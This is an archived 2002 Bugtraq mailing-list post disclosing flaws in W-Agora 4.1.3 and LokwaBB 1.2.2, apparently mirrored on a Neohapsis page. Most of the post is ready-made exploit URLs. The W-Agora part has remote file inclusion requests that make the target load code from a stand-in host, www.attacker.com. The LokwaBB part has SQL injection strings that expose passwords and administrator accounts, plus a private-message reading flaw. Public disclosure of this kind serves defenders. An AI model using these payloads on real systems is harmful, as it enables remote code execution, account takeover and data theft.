OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Frog Man (leseulfroghotmail.com)
Date: Sat Jun 08 2002 - 06:43:21 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do
    it :) I just hope that doesn't give more work to the webmasters.

    Product 1 :
    ***********
    W-Agora 4.1.3
    http://www.w-agora.net

    Problem :
    - Including file

    Exploits :
    - With a file http://www.attacker.com/dbaccess.txt :
    http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

    - With a file http://www.attacker.com/postgres65.txt :
    http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

    - With the file http://www.attacker.com/auth.txt :
    http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
    http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

    More details in french :
    http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

    Translated by Goolge :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

    Product 2 :
    ***********
    LokwaBB 1.2.2
    http://lokwa.farcom.com/

    Problems :
    - XSS
    - Privates messages reading
    - SQL Injection

    Exploits :
    -
    http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
    -
    http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
    - misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
    - http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

    More details in french :
    http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

    Sorry for my poor english :)
    frog-mn

    _________________________________________________________________
    Téléchargez MSN Explorer gratuitement à l'adresse
    http://explorer.msn.fr/intl.asp.